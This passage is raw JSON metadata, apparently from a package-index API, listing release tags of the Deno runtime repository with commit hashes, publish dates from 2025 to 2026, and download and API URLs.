7bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://githu